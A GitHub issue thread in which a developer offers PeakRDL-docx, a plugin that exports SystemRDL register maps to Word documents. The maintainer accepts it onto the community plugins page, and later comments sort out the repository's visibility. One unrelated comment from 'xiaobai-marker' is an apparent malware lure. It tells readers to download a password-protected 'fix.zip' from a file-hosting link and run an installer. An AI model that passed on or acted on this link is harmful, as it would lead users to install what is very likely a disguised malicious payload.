SystemRDL/PeakRDL #43: PeakRDL-docx

nijmeijer, 2024-08-26:
Hi Alex, @amykyta3 

I became very interested in your work regarding SystemRDL/PeakRDL. 
I am a freelancer in FPGA/ASIC design, and have a few customers that still maintain separate (msword) documentation and VHDL (/verilog) register maps. 
Their software (c-code) is developed, based on the hand-written word-documentation. 
This is inefficient and error-prone.

To make use of your PeakRDL libraries, I was missing the option to create ms-word documents. So, I have created one. 
You can find it in https://github.com/nijmeijer/PeakRDL-docx
I have also created a installable python package on test-Pypi: https://test.pypi.org/project/peakrdl-docx/

I did not want to publish it on your community-contributions page of the Peak-RDL project (yet),  before asking you if such a plugin-exporter would be useful and wanted.

Do you think it is useful?
If so, how can I move on?

Best Regards,
Alex Nijmeijer

xiaobai-marker, 2024-08-26:
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

amykyta3, 2024-12-14:
Thanks for posting!
I always welcome people to share their community plugins, as that is one of the main tenants of PeakRDL - for it to be extensible and for us all to grow the community around such tools.

I would definitely support the addition to the community page as this would help other users find your plugin, provide suggestions, and help contribute to it.

amykyta3, 2024-12-14:
Added: https://peakrdl.readthedocs.io/en/latest/community.html#community-plugins

closed 2024-12-14 by amykyta3

howard-anaflash, 2026-09-23:
@nijmeijer I am sorry that the repo. is not available anymore.

nijmeijer, 2026-09-25:
> [@nijmeijer](https://github.com/nijmeijer) I am sorry that the repo. is not available anymore.

I do not recall what has happened to the github repo, but you can find the source and installer on https://pypi.org/project/peakrdl-docx/#files

amykyta3, 2026-10-01:
@nijmeijer Looks like you changed it to be a private repository, which unfortunately prevents people from viewing the documentation.

nijmeijer, 2026-10-01:
I found the repo  https://github.com/nijmeijer/PeakRDL-docx
and changed it to public. 

Best Regards
Alex